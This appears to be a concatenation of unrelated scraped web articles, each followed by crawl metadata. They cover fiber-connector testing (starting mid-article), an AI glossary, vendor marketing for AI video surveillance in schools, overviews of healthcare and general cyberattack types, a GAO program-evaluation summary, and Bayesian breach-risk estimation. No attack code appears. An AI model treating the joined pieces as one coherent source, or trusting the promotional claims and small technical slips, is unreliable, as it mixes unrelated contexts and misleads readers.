The first figure (at right, top) shows the reflective event on an unterminated fiber, while the one below shows the same event with a properly terminated connector. These figures show the extreme. But what if the connector looks "good" in a fiber scope? Does the ghost then represent a fault? Provided the OTDR has been set up properly (the pulse width and pulse duration appropriate for the fiber length), then yes, a ghost represents a fault at the connector.
For most of us, when we look into the fiber scope and the end face of the connector looks perfect, we determine that the connector is "good." While true, what we're seeing is the two-dimensional view of a three-dimensional object. Fiber connectors, such as the ST, SC, and LC, are domed, while connectors such as the APC, MPO, and MPT have a different configuration.
Determining the connector's role
Before we can determine the cause of the fault, we need to determine what part the connector plays in the passive optical fiber link. By definition, the purpose of the connector is a temporary connection between two optical-fiber links to couple the light with a minimum of insertionloss (attenuation) and reflectance.
The primary connectors in use today in the enterprise LAN are what are termed Physical Contact (PC) type. The fiber connector is polished so that the fiber is at the center and the highest point, and is first to meet. There is no air gap, fibers compress until the ferrules contact, and the ferrules take the majority of the compressive force.
One key optical parameter for connectors is fiber attenuation. It is measured in dBm per mated pair (the light passing through one connector is meaningless, as it is going nowhere). Attenuation is the sum of losses caused by:
- Overlap of the fiber cores;
- Alignment of the fiber axis;
- Fiber Numerical Aperture;
- Mating space between connector barrels;
- Reflection at fiber ends;
- Angular misalignment;
- Axial alignment.
Overlap is the sum of several different effects—the axial and angular alignment of the two fibers, connector and coupling, variations in core diameter, concentricity of the core within the cladding, and the eccentricity of the core.
For axial alignment, a good rule of thumb is an offset of 10% equals 0.6 dB loss. For a 50-µm fiber, that equates to 5 µm; however, for singlemode, that distance is only .8 to .9 µm. When the fibers are out of angular alignment (in the field, the most common cause is a defective coupler), the light entering the second fiber is at a steeper angle; thus, some of the light is refracted into the cladding.
Fiber Numerical Aperture (NA) is defined as the acceptance angle of the light that enters and is propagated in the fiber. This has also been termed the cone of acceptance, as shown in the figure on page 8. The light exits the fiber in exactly the same cone as it entered.
Reflections, more properly termed Fresnel reflections, occur when light exiting the fiber encounters a material with a different index of refraction, and are the result of the change from glass to air. Fresnel reflection loss is also affected by distance—the greater the distance between the fiber ends, the greater the loss. Internal connector reflections can cause spurious modulation and noise in laser light (feedback lasers), which mayresult in system failure.
Reflections of a ghost
Reflection noise is an important concern in analog video as it may saturate the transmission device, causing system failure. As the distance increases, so does the corresponding loss. These reflections, with enough magnitude, are what we see on the OTDR trace as a ghost.
As we have seen in the forgoing discussion, that "little, insignificant" connector has a great deal of significance in the passing of the signal through the passive optical fiber link. The question now becomes, how do you test an optical-fiber connector to the parameters just discussed?
Up until a few years ago, we could not. It was done in the laboratory, using a test set called an interferometer. The tester was highly complex, susceptible to movement (it sat on a large concrete base for stability), and was not considered for field use. Several years ago, however, two companies—FIBO (www.promet.net/) and Norland Products (www.norlandprod.com/)—developed a field transportable unit. With the development of the field transportable interferometer, (it has been in use in the laboratory for many years), you now have the ability to test terminated connectors in the field.
The interferometer uses the principal of light wave interference, which occurs when two or more waves of the same frequency or wavelength combine to form a single wave whose amplitude is the sum of the amplitudes of the combined waves. Constructive and destructive interference are the most striking examples of light wave interference. Constructive interference occurs when the light waves are completely in phase with each other (the peak of one wave coincides with the peak of theother wave). Destructive interference occurs when the light waves are completely out of phase with each other (the peak of one wave coincides with the trough of the other).
Interferometers can produce images and data to sub-micron accuracy using the principle of wave interference. They use a single coherent light source, and to produce two separate light waves for interference to occur, a partially reflective beam splitter is used. As the light hits the beam splitter, one wave front is transmitted through the beam splitter, through an objective lens, and to the object being examined. Theother light wave reflects off of the beam splitter onto a stationary reference mirror.
After each light wave has been reflected off of the surfaces(the surface of the object being examined and the reference mirror), the waves combine to produce constructive and destructive interference waves--also known as light and dark fringes, respectively. Each dark fringe identifies a specific height onthe surface of the object being examined. Typically, two adjacent dark fringes have a height difference of half a wavelength of the light being used, and so can show a surface contourof the connector end face that's similar to the concept of con-tour maps used to show different elevations of a land surface.
Tool testing and measurement
The interferometer tests several components of the connector. The three major measurements are the radius of curvature, offset of polish (also called Apex offset), and fiber height.
This radius of curvature portion of the test determines the overall diameter of the best-fit sphere and its relationship to the actual end of the connector under test. Therefore, the spacing and diameter of the circular fringe pattern are directlyrelated to the radius of curvature.
The offset of polish determines the actual centerline of the fiber and its relationship to the actual centerline of the best-fit curve. With the ideal connector, both centerlines would be the same.
The fiber height portion of the evaluation determines the amount of fiber that is above or below the end of the connector end face.
Based on these three parameters, a test report may be generated as shown in the figure above. In this case, the connector is within limits for all of the tested parameters; however, the basic question remains—why field-test the connectors? To answer this question, you'll need to examine the condition that may occur when you join two connectors, and the relationship between the two.
The objective is minimum loss as well as minimum reflectance. Optical-fiber connectorization is based on the principal of Physical Contact (PC). When two "ideal" connectors are joined, the interface should be as shown in the figure "An ‘ideal' connector interface" (page 12).
When using the PC concept, the only concern is the center of the connector. The fibers are polished so that they are at the center and the highest point and are first to meet. There is no air gap. The fibers compress until the ferrules contact andabsorb the majority of the compressive force.
Using interferometry helps guarantee optical performance by providing consistent quality control of the polishing process. This assures long-term stability when connectors are exposed over time to changes in temperature, pressure, and the affects of vibration.
So, what is a "bad" connector? It can be one of three types: Undercut, which is the result of overpolishing; offset; and protrusion, which is the result of under polishing.
Undercut results in an air gap between the connectors and a corresponding increase in both attenuation and reflectance. In this instance, the glass within the connector may "piston" over time. This is probably the failure most often seen. (This condition is generally caused when a high magnification scope is used and the tech tries to get the last little scratch off of the end face of the connector).
The second condition, offset, may be caused by not holding the polishing puck tight-and-square to the lapping film during the polishing process. With the use of today's pre-radiused connectors, and proper polishing technique, offset should not be a major problem.
In the last type of failure, protrusion, the fiber is protruding from the end of the connector. When the end face of one connector meets with the second, something has to give. As shown in the figure on page 13, the result is push back—the fiber on the protruding connector pushes thefiber on the second connector back into its ferrule. This is the best case. Have you ever wondered why a connector that was good yesterday was found shattered today? Yes, under pressure, glass will break and usually at the most inopportune time.
Factory-polished, or not?
At this point, I can see many of you thinking, "all of this is great, but we only use ‘factory-polished' connectors." But what constitutes a factory-polished connector? What is the manufacturing process? Some are machine-polished; however, as more and more of these products are manufactured off shore, a great many are hand-polished in the factory. Factory quality control is dependent on a manufacturer's quality control program. Even so, quality control depends for the most part on statistical testing. If a representative number within a batch pass, it is assumed that the remainder will also pass. (Remember, that is why the U.S. passed the "Lemon Law".)
When and which connectors should you test with aninterferometer? The answer is about the same as the answer to "when should you use an OTDR?" (See "The right tools for accurate fiber-optic testing," CI&M August 2008, pg. 13.)The primary test for any optical fiber passive link remainsthe Optical Loss Test using the Optical Loss Test Set (OLTS).A part of this test set includes the reference cables, whichshould be of the highest quality.
This is one of the reasons why the TIA has recommended the use of singlemode-grade connectors for multimode reference cables. It has been my experience over the years that once the reference cables (which came with the test set) are worn out, the replacement is not a new reference cable from the test set manufacturer, but any patch cord available. OLTS testing should also include the testing of the launch and receivecables for the OTDR.
You do not need to test every connector that you install. Follow the guideline normally applied to OTDR testing requirements—they are about the same. First priority would be any circuit where low loss and reflectance are a priority—bothdata and video. Next are the backbone circuits that ardesigned for transmission at high data rates—10 GB and above. This applies not only to the permanent part of the circuit but also to the patch cords. Short circuits, such as fiber-to-the-desk-top, once they have passed the optical loss test, should not require any further testing.
The interferometer is also an excellent troubleshooting aid. If you encounter a circuit that shows a higher than expected loss or ghosts, in most cases, the fault is in the connector. When the connector looks good in the fiber scope, while the OLTS will not give the answer, the interferometer will.
When both the connectors pass, the only remaining item is the coupling test. The interferometer is the only methodthat I know of that will pinpoint this defect.
Another use for the interferometer is fiber connectorization training. I began using the interferometer in our OSP fiber course about two years ago and have found that, with even the "old fiber hands," there is a tendency to over-polish. Over-polishing results in undercut and distortion of the connector end face, thus generating higher loss and high reflectance. If the technician can do connectors that pass the interferometer in the training, the same result should show up in the field.
Lastly, if you who use crimp-style connectors or pigtails, the interferometer is an excellent quality control tool. When you receive a new batch of connectors or pigtails, perform you own quality control test. If the first sample shows bad connectors, test the remainder of the batch. It is much more cost-effective to catch a problem in the shop than after the connector has been installed in the field.
Tools of assurance
Using common troubleshooting tools—a visual fault locator (VFL), OLTS, OTDR, and the interferometer—will ensure your customer has the highest quality optical fiber networkpossible.
CHARLES C. LOHRMANN, RCDD/OSP, TPM, RITST, BICSI master instructor, is chief financial officer at TSI Compass International Limited Inc. (www.tsicompass.com). NEIL WAGMAN is sales manager with Norland Products Inc. (www.norlandprod.com). | <urn:uuid:b214c303-3ce3-4c98-bef8-8660083e7b6b> | CC-MAIN-2024-38 | https://www.cablinginstall.com/connectivity/article/16466315/optical-fiber-testing-to-the-last-nanometer | 2024-09-20T14:12:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00423.warc.gz | en | 0.933012 | 3,211 | 3.09375 | 3 |
Get started with the most important terms, explained
The AIC4 (Artificial Intelligence Cloud Service Compliance Criteria Catalogue) defines minimum requirements for the secure use of machine learning methods in cloud services.
Bias describes a systematic error that can result from either insufficient data or judgment errors. A cognitive bias in machine learning models can lead to discrimination of certain people.
The Bundesamt für Sicherheit in der Informationstechnik (BSI) is the German government's cybersecurity authority and is shaping secure digitization in Germany. The AIC4 criteria catalogue was largely developed by the BSI.
The Cloud Computing Compliance Criteria Catalogue (C5) defines minimum requirements for secure cloud computing and is primarily aimed at professional cloud providers, their auditors, and customers.
With the Conversational AI platform Cognigy.AI, companies can deploy intelligent voice and chatbots across the organization to automate their customer/employee communications at all touchpoints.
Conversational AI is a branch of artificial intelligence that utilizes software and technologies such as natural language processing, machine learning, and automatic speech recognition to facilitate communication between a human and a machine.
Explainable AI is a concept that makes artificial intelligence methods, e.g. neural networks or deep learning systems, explainable and comprehensible. Among other things, it is intended to solve the so-called "black box" problem, meaning that it cannot be clearly explained how a machine learning model reaches a decision. The need for explainable - and thus trustworthy - artificial intelligence is an important action field in the AIC4 catalog.
Natural Language Processing (NLP) enables computers to understand and interpret human language.
Natural Language Understanding (NLU) is a sub-field of NLP that explicitly deals with the understanding of human language. It is primarily concerned with nuances such as context, mood (so-called "sentiment"), and syntax.
PricewaterhouseCoopers (PwC) is Germany's leading auditing and consulting firm. The company audits AI services as part of the AIC4 criteria catalog and provides objective audit reports. | <urn:uuid:4d644f6a-216f-43b3-b864-664e87f4af4e> | CC-MAIN-2024-38 | https://www.cognigy.com/resources/trustworthy-ai | 2024-09-20T13:48:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00423.warc.gz | en | 0.898182 | 433 | 2.671875 | 3 |
Educational institutions are witnessing an ever-growing technology integration — be it interactive whiteboards or online learning platforms. It’s clear that technology is reshaping how we teach and how students learn.
Now, let’s zoom in on a different branch of technology used in education — video analytics. Imagine a tool that captures video and analyzes captured footage using artificial intelligence (AI).
Video analytics in K-12 education can gain insights and identify patterns that could help school safety, security and operations. And by utilizing AI, education video analytics systems can detect anomalies, monitor campus activities and aid in incident investigations.
This technology goes beyond watching recorded footage — it’s about leveraging technology to create safer, more efficient learning environments for students. This article dives deeper into AI video analytics in school security so you can decide whether it’s right for you.
Understanding AI Video Analytics
Video analytics monitors, analyzes and manages massive amounts of video using modern algorithms and machine learning (ML). It’s like having an intelligent security assistant that watches over your school campus 24/7.
Now, let’s look at the critical components of a video analytics system. You’ve got your cameras — which are the eyes of the operation, capturing all the action. Then, there are sensors that pick up additional data, such as motion or sound. But the real magic happens with AI-powered analytical software.
Video analytics is the brain behind the cameras, helping them do more than record footage. With AI in the mix, video analytics becomes even more powerful. AI adds a layer of brain power by teaching the system to recognize patterns, identify objects and understand human behavior.
Applications in K-12 Education
The use of AI in education in conjunction with video analytics can create safer learning environments where students can thrive and succeed. Here is how AI video analytics can be used in K-12 education.
Enhancing School Security
AI video analytics constantly monitor the school’s activities to ensure the safety of its students and staff. It can flag anything out of the ordinary. For instance, someone lingering in a restricted area or a sudden change in lighting. It can even recognize faces or license plates, helping to track down missing students or identify unauthorized visitors.
By constantly scanning the premises, AI video analytics is a proactive measure against potential threats. This approach helps maintain a secure environment for teaching and learning.
Facilitating Incident Investigation
In the unfortunate event of an incident, such as bullying, theft, or vandalism, AI-based video analytics can expedite and streamline the investigation process. Analyzing video footage can provide vital insights into events, assisting authorities in resolving conflicts and responding to situations quickly.
For example, AI video analytics can provide valuable insights into a physical altercation. It can help identify the participants, trace their activities and give critical evidence for disciplinary action or legal procedures. AI video analytics speeds up the investigative process by quickly analyzing large volumes of data, ensuring a thorough and correct reaction to accidents.
Supporting Conflict Resolution
AI video analytics offers objective, evidence-based insights into interpersonal disputes or disciplinary issues. By analyzing video evidence, it is possible to uncover the root causes of conflicts. Video footage can also estimate the severity of situations and support constructive solutions.
For example, in cases of bullying or harassment, AI video analytics can detect patterns of behavior, monitor interactions and provide useful evidence for intervention or counseling. With its ability to recognize subtle cues and behaviors, these systems help institutions efficiently manage problems. As a result, it can promote a secure and inclusive learning environment for all students.
Enabling Emergency Response
AI video analytics ensures a timely and coordinated response during crises, such as fire drills or lockdowns. Monitoring crowd behavior and identifying potential threats or bottlenecks enables authorities to assess the situation and apply relevant safety measures.
For example, during a lockdown, AI video analytics may follow individual movements, detect security breaches and offer real-time information to first responders. AI video analytics improves the effectiveness of emergency response systems by analyzing complicated circumstances and providing actionable insights.
5 Benefits for Educators and Administrators
Video analytics in K-12 education benefits students, educators and administrators alike. Here are five advantages to remember:
1. Enhanced Safety and Security
AI-powered security solutions add an extra layer of protection by continuously monitoring activity and detecting potential threats in real-time. These systems operate as vigilant watchdogs, identifying unauthorized individuals and detecting aberrant behavior patterns to prevent situations from escalating.
2. Efficient Resource Allocation
AI video analytics optimizes resource allocation by giving helpful information on campus operations and utilization. Administrators can make better resource allocation, scheduling and facility management decisions based on various metrics. These metrics include student movement, facility usage and traffic patterns. This results in more efficient resource use, better logistical planning and increased productivity.
3. Data-Driven Decision-Making
AI video analytics helps institutions make data-driven decisions by analyzing large volumes of data quickly and accurately. For instance, these systems can help customize instructional tactics, identify growth areas and personalize student learning experiences.
This is made possible by video analytics’ actionable insights into student behavior, academic performance and campus dynamics. Similarly, admins can utilize data analytics to evaluate policy efficacy, monitor key performance indicators (KPIs) and promote continuous improvement throughout the school ecosystem.
4. Proactive Intervention and Support
Educators can help children achieve academically and emotionally. Video analytics can help monitor student behavior patterns, spot symptoms of discomfort or disengagement and highlight possible problems early on. This proactive approach to student support creates a positive learning environment where all students feel appreciated and encouraged to achieve their full potential.
5. Streamlined Operations and Workflow
AI video analytics improves operations by automating regular tasks and optimizing workflow processes. AI-powered security tools can automate routine tasks like visitor access and tracking school attendance. Automation allows educational institutions to focus on more strategic objectives. As a result, it can lead to smoother operations and higher employee morale.
Challenges and Considerations
Implementing AI video analytics in K-12 education comes with its challenges. Here are the potential hurdles and considerations of education video analytics:
- Privacy concerns: Schools must establish policies and procedures for data collection, storage and usage. They must comply with relevant regulations such as the Family Educational Rights and Privacy Act (FERPA). Also, implementing data encryption and access controls can safeguard sensitive information.
- Resource constraints: Limited budgets and resources can pose challenges when adopting AI video analytics. Schools can overcome this by exploring cost-effective security technology solutions. They can also leverage open-source software and seek partnerships with technology providers. Training staff and educators on using AI tools effectively may also help.
- Technical limitations: Technical challenges may arise, such as compatibility issues and system integration complexities. Schools should conduct thorough testing and pilot programs to identify and address technical hurdles early. Work with experienced vendors or seek expert guidance to help mitigate these technical risks.
- Ethical use of AI: Schools must prioritize transparency, fairness and accountability when implementing AI video analytics. Educating stakeholders on the ethical implications of AI technology and cultivating an ethical decision-making culture are critical steps in promoting responsible AI use in education.
Unlock Your School’s Potential With AI Solutions by BCD
With its capabilities, AI video analytics can transform K-12 education. Unlock your school’s potential with BCD’s AI-ready solutions tailored to the unique needs of educational institutions.
Since 1999, BCD has been at the forefront of purpose-built video storage solutions. We partner with globally known security pioneers to provide AI video surveillance systems. With our security technology and commitment to customer satisfaction, schools can create safer, more engaging learning environments for their students.
Contact us online today for further information. | <urn:uuid:6bd0f1d0-bf5e-48dd-bdb5-1c4c743b6110> | CC-MAIN-2024-38 | https://www.bcdvideo.com/blog/video-analytics-in-k12-education/ | 2024-09-09T15:36:30Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00523.warc.gz | en | 0.917737 | 1,598 | 2.875 | 3 |
Cyberattacks on the healthcare sector are rising and becoming more sophisticated today, and big hospitals and small private clinics are both targets. Just in the past three years, more than 93% of healthcare companies have suffered a data breach. There has also been a 45% increase in cyberattacks targeting healthcare organizations globally since November 2020.
Why do cybercriminals target the healthcare industry?
Cybercriminals target healthcare companies because they store large amounts of protected health information (PHI) such as medical records, Social Security numbers, credit card details, and other similar data. Hackers steal these types of data and sell them on the Dark Web.
It doesn’t help that many firms still use outdated technology and legacy systems. According to a Duo Security report, 76% of healthcare organizations in 2020 were still using computers running Windows 7, an operating system that no longer receives updates or security patches. Many companies do, in fact, fail to keep their systems up to date not just because of costs, but also due to concerns that upgrading would cause operational disruptions.
What are common cyberthreats to healthcare?
Being aware of the most frequent cyberthreats to healthcare can help protect your business from data breaches and other disasters. Let’s take a look at some of them:
Phishing involves an attacker sending out a fraudulent email, text message, or making a call to trick a victim into giving out confidential information. And today, healthcare is one of the industries that are often victimized by phishing attacks.
In a study published in the Journal of the American Medical Association, it was discovered that many hospital employees still fall for phishing emails, with one out of seven recipients clicking on phishing emails per a simulated phishing test.
This shows that many hospital employees have difficulty spotting a phishing mail, which makes hospitals highly vulnerable to phishing scams. What's worse is that it only takes one successful phishing attack to compromise an entire healthcare organization's IT system.
2. Business email compromise (BEC)
BEC is a cyberattack targeting organizations working with businesses that regularly perform wire transfer payments. This attack compromises or fakes corporate email accounts to conduct unauthorized fund transfers. A BEC attack can be done in two ways:
- CEO fraud: A hacker poses as a high-level employee of a company and requests payments from customers and partners.
- Invoice payment requests: A hacker pretends to be a legitimate vendor and sends a fake invoice requesting a payment usually via wire transfer.
BEC scams have destructive effects on businesses. In fact, between January 2014 and October 2019, the FBI Internet Crime Complaint Center received complaints equating to more than $2.1 billion in losses from BEC scams.
Ransomware is a malicious program that encrypts a computer’s files and applications, and threatens to prevent access to data and/or systems unless a ransom is paid. Such attacks are damaging to healthcare organizations because these could affect their ability to deliver proper patient care, and even endanger the lives of patients.
In August 2019, physicians from a Washington hospital were forced to document cases on paper after their organization was hit with ransomware. And in late 2020, hospitals became the main target of the Ryuk ransomware, a targeted attack that was responsible for 75% of the ransomware attacks on the US healthcare sector.
Healthcare businesses are more likely to pay the ransom than deal with downtime, which is why cybercriminals commonly target them. Unfortunately, paying will not always guarantee the recovery of data or access to the system, as some cybercriminals may refuse to give a decryption key. Some attackers may even publish the data they stole, if a company refuses to pay the ransom.
4. Distributed denial-of-service (DDoS) attacks
In a DDoS attack, cybercriminals use thousands of computers to target an internet-accessible system and flood it with connection requests. Once the traffic becomes too heavy, the network will crash and become unusable.
This poses a serious threat to companies that rely on constant access to their network to operate and provide proper patient care. For this reason, healthcare companies must remain alert to such attacks because DDoS attacks on healthcare systems rose substantially in 2020 when the pandemic forced many businesses, including healthcare organizations, to go digital. It is predicted that cybercriminals will continue targeting the industry in 2021.
Don’t let cybercriminals compromise your company’s security and steal your data. Partner with a trusted managed IT services provider like Healthy IT. Our top-class Cybersecurity Solutions will provide your healthcare practice with multilayered security and 24/7 surveillance to keep your data constantly protected. To learn more about cybersecurity best practices, download our FREE eBook today! | <urn:uuid:5b5d238a-86db-47ba-9a14-5658dc1f2646> | CC-MAIN-2024-38 | https://www.myhealthyit.com/the-4-most-common-healthcare-cyberthreats/ | 2024-09-12T03:13:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00323.warc.gz | en | 0.959816 | 971 | 2.65625 | 3 |
The internet is an ever-changing landscape. As new technologies are created, hackers find ways to exploit them for their gain. Sometimes the damage can be minimal, but other times it can be devastating. In this blog post, we will look at 5 of the most dangerous types of cyber-attacks that your business may face and how you can protect yourself against them.
One of the most common cyber-attacks is a denial-of-service or DOS attack. This type of attack occurs when hackers send an overwhelming number of requests to your website/server, overloading it and causing service interruptions that can last for hours.
There are several mitigation techniques that you should put into place, including using cloud-based servers that provide high availability, failover capability in case one server goes offline, and utilizing load balancers to distribute traffic across multiple machines so if one fails, another will take its place.
Recent DOS attacks
Wikipedia is an unparalleled treasure trove of knowledge translated into more than 250 languages and viewed by over one billion people. However, this didn’t stop them from being targeted in a DDoS attack back in 2019, which caused the site to be down for European, Middle Eastern, and American users for over nine hours.
Phishing attacks are one of the most dangerous cyber-attacks because hackers prey on unsuspecting users by sending emails that appear to be sent from a trusted source to get personal information or an account password.
You can protect yourself by training employees not to click links within emails but instead go directly to websites using bookmarks or typing them into their browser.
Recent phishing attacks
One of the best-known security breaches in recent history was caused by phishing emails sent to Sony employees. After posing as employees they found on social sites like LinkedIn, hackers were able to gain over 100 terabytes of data, costing them an estimated 100 million dollars.
Man in the Middle (MITM)
A man-in-the-middle attack is when a hacker inserts themselves between you and another person so they can intercept traffic such as emails, instant messages, or passwords.
You must always be vigilant about what websites your employees visit, including their connection security which means knowing if SSL certificates have expired or not, among other things.
Recent man in the middle attacks
A recent hacking incident has been reported, in which hackers pulled off a man-in-the-middle attack to steal from an Israeli startup. The hackers ended up intercepting a $1 million wire transfer from a Chinese venture capital firm that was meant for the startup.
Malware attacks occur when a hacker inserts malicious software on your computer or network that can come in many different forms.
You can protect yourself by installing anti-malware tools such as antivirus solutions that have an active protection component built into it where they work constantly scanning files for threats before they get a chance to execute.
Recent malware attacks
Hackers exploited the fear brought on with COVID-19 by creating the CovidLock ransomware. The app seemed to be a COVID tracking tool, alerting individuals of hot spots and areas with a higher infectivity rate, but it was a front for a vicious malware attack.
The app infected users’ phones and locked their data until they paid $100 in bitcoin for recovery services. By asking users to give administrative access to their devices, the cybercriminals had access to a slew of personal information from their victims.
An injection attack is when hackers exploit code in your website to access sensitive information such as login credentials or financial data.
The best way you can protect yourself from these types of cyber-attacks is by logging everything that happens within your network, including suspicious activities, whether this is on a gateway, server, or any other device connected with some being able to provide real-time alerts if something does happen.
Recent injection attacks
A hacker back in 2017 was able to hack government agencies and 63 different universities across the globe using SQL injection attacks. Though it’s not entirely known which systems were compromised, the information stolen could include private data about staff and students, intellectual property such as research findings, or patented inventions.
As a trusted provider for managed IT services, Innovative Network Solutions can help you implement security measures that will keep hackers away. If your business is interested in learning more about how to stay protected from some of the most dangerous types of cyber-attacks out there, contact our cybersecurity experts today. | <urn:uuid:dd89f937-dc80-42d7-8fa3-c195e44e23df> | CC-MAIN-2024-38 | https://www.inscnet.com/blog/the-5-most-dangerous-types-of-cyber-attacks/ | 2024-09-16T22:50:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00823.warc.gz | en | 0.95054 | 903 | 2.5625 | 3 |
The Government Performance and Results Modernization Act of 2010 (GPRAMA) was intended to provide federal leaders with objective program effectiveness information and aid in federal agency decision-making. However, a Government Accountability Office (GAO) survey of federal managers, GAO-13-518, indicated a widespread absence of program evaluations, as well as a lack of progress in the use of available performance information.
In order to identify areas for improvement, the GAO recently conducted a study, Program Evaluation: Some Agencies Reported that Networking, Hiring, and Involving Program Staff Help Build Capacity. The study reviewed the capacity of federal agencies to conduct and use program evaluations.
Program evaluations are methodical analyses that review specific issues of program performance. While program measurement generally tracks progress against goals determined at the program outset, program evaluation“typically assesses the achievement of a program’s objectives and other aspects of performance in the context in which the program operates.”
One objective of the GAO study was to identify activities that are useful in building capacity to conduct and use program evaluations. The GAO study surveyed performance improvement officers at 24 agencies, which included DoD and civilian agencies. According to the study, the most useful activities for increasing capacity to conduct evaluations include:
- Hiring – Recruit personnel with research and analysis experience. Some agencies use hiring programs such as Presidential Management Fellows, Intergovernmental Personnel Act or the American Association for the Advancement of Science fellows program.
- Professional Networking – Encourage staff to participate in conferences or related interest groups. One example mentioned by those surveyed was the Association for Public Policy Analysis and Management Research Conference.
- Consulting experts – Consider consulting with experts for theoretical or technical support; identifying areas in which agency staff may need additional assistance.
- Training – Build staff capacity through specific skills and knowledge training. Personnel may benefit from classroom or online training in areas such as data and statistical analysis techniques, design of program evaluations, and converting evaluation results into agency recommendations.
- Accountability – Holding leaders accountable and conducting quarterly progress reviews were mentioned by several study respondents as beneficial for improving agency ability to conduct evaluations.
Once an agency is successfully conducting evaluations, it is essential to apply the acquired information to improve outcomes. The performance improvement officers surveyed identified quarterly progress reviews, engaging staff, and enforcing accountability for agency goals as activities which promote the use of evaluations in decision-making. In particular, including staff throughout the program evaluation process generates early buy-in of evaluation findings.
Developing capacity to conduct and use program evaluations can allow agencies to be better informed for future decisions. With some intentional planning, infrastructure activities such as hiring practices, networking, training, support services and accountability structure can be harnessed to improve outcomes and ultimately, mission objectives. | <urn:uuid:03dbdabf-927e-43e0-aab6-def4061a87f0> | CC-MAIN-2024-38 | https://changeis.com/innovategov/gao-using-program-evaluations-for-more-effective-management/ | 2024-09-18T04:50:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651836.76/warc/CC-MAIN-20240918032902-20240918062902-00723.warc.gz | en | 0.939745 | 563 | 2.609375 | 3 |
| 4 min read
Table of contents
One of the main obstacles against adopting a quantitative approach to risk management is that since major security breaches are relatively rare and hence, there cannot be enough data for proper statistical analysis. While this might be true in the classical sense, it is not if we adopt a Bayesian mindset, which basically amounts to being open to change your beliefs due to new evidence.
Remember the Rule of 5? It allows us to give a 90% confidence interval with only 5 samples. This is already a counterexample for the "not enough data" obstacle. Also recall how we used probability distributions in order to run simulations on many possible scenarios and updated our beliefs based upon evidence, all based only on a few expertly estimated probabilities. In this article we will show how a probability distribution can be derived from simple observations.
Suppose we want to estimate the batting average --the ratio of hits to the number of times he stands at the bat-- for a particular player. One way to do so would be to look at their rolling average, i.e., his average so far. The law of large numbers tells us that no matter what happens at the beginning, the rolling average will tend to the true value, if you observe it for long enough:
Rolling average tends to the true mean. Via Brad DeLong.
The only problem is, we don’t have long enough. Baseball seasons are finite, and major cybersecurity events are few and far between. What is one to do? If we go with the rolling average like in the above image, we would be stuck with the initial, imprecise part of it. For instance, after the first try, the player’s average will be either exactly 0 or 1, which clearly does not reflect the reality well.
Enter the beta probability distribution. This distribution takes two parameters which determine its shape and spread, and are cryptically called alpha and beta, but in reality can be though of as hits and misses from a certain sample. We may also think that the density function of this distribution gives us the probability that a proportion, ratio or probability of an event is just that. No, it was not a typo. We can think of the beta distribution as being the probability distribution of probabilities themselves. As such, we can use it to obtain the probability of being attacked after having observed who has been attacked (the hits) and who has not (the misses) in a certain period of time.
Beta distribution with different parameters. By Shona Shields on Slideplayer.
Wait: it gets better. The beta distribution can be updated with evidence and observations, just like we did when working with Bayes Rule, to give better estimations. Since alpha and beta represent hits and misses, and if we observe some breaches and some non-breaches, why not just add them to the original parameters?
It can be shown that the beta distribution, modified this way, reflects reality much better than the previous estimate. And we can continue doing this in a repetitive manner everytime there is an observation.
Imagine an even simpler situation: what is the probability that a coin lands heads? We don’t know whether the coin is fair or has been loaded to give more priority to some results than others, so we might just roll it many times, record the results (how many heads and how many tails) and fit a beta distribution in the manner described above. The results would be as follows:
Adjusting a beta distribution to new evidence.
Notice how the distributions after the first two tosses resulted in head do not just say that the probability of heads is 100%, which is what the rolling average would point to, which is clearly wrong. Instead, the beta distribution sort of smoothes out what would be a sharp, extreme yes/no situation, allowing a chance to values in between. After only 3 tosses the distribution starts to look like a proper distribution. It gives the probability that the probability of obtaining heads has a certain value. After 50 tosses we can conclude, with evidence and a mathematically sound supporting method, that the coin was fair after all.
Next, how do we go about applying this to security breaches? What exactly would be the "hits" and the "misses"? Recall that we update our knowledge of hits and misses by taking random (tough typically small) samples from an unknown, allegedly large population. Since we want to estimate the probability that a business like our own would suffer a major attack, then the population should be a list of companies similar to ours. Call that the top 10, 100, etc of your country/region/world. Out of those, take a random sample, and check against a public database of cybersecurity events (such as the Verizon Data Breach Investigations Report) to see if any of the sampled companies suffered an attack.
We also need seeds for the alpha and beta parameters. These could be expert estimations or, if you want to be very conservative, you can set both to 1, which would give simply a uniform distribution (everything is equally likely). This is the most uninformative of all possible priors. It is totally unbiased. Again, by the law of large numbers, it doesn’t really matter much where we begin. But the better the initial estimates, the faster the convergence to the "truth". Starting with this uniform prior and observing that there is one attacked company in the sample over a 2-year period, we obtain the following beta distribution:
Beta distribution for breach frequency.
When we have a distribution, we know pretty much everything. We can give find an expected probability of attack or, better yet, a 90% confidence interval in which that probability lies. We can also use it to update our previous models. Remember that in our simulations to obtain the Loss Exceedance Curve, we used a log-normal distribution simply because it was the best fit due to some of its properties. Now we have a better reason to use this beta distribution we obtained here, and running the simulations again with this distribution would yield the following results:
Notice how, by using the beta distribution, it is clear that higher losses are more likely, while smaller losses are less so. Given that this beta distribution was built using real data, this should be a more appropriate estimate of reality.
Thus, the Bayesian interpretation of statistics and, in particular, the iterative updating of a fitted beta distribution can aid your company in better understanding risk, and not only in cibersecurity, since nothing in this method is inherent to cybersecurity risk. Especially in combination with random simulations, which turn these abstract distributions into concrete bills and coins.
C. Davidson-Pilon (2019). Probabilistic Programming and Bayesian Methods for Hackers.
D. Hubbard, R. Seiersen (2016). How to measure anything in cibersecurity risk. Wiley.
M. Richey M. and P. Zorn (2005). Basketball, Beta, and Bayes. Mathematics Magazine, 78(5), 354.
D. Robinson (2015). Understanding the beta distribution (using baseball statistics). Variance Explained.
Table of contents
Recommended blog posts
You might be interested in the following related posts.
How it works and how it improves your security posture
Sophisticated web-based attacks and proactive measures
The importance of API security in this app-driven world
Protecting your cloud-based apps from cyber threats
Details on this trend and related data privacy concerns
A lesson of this global IT crash is to shift left
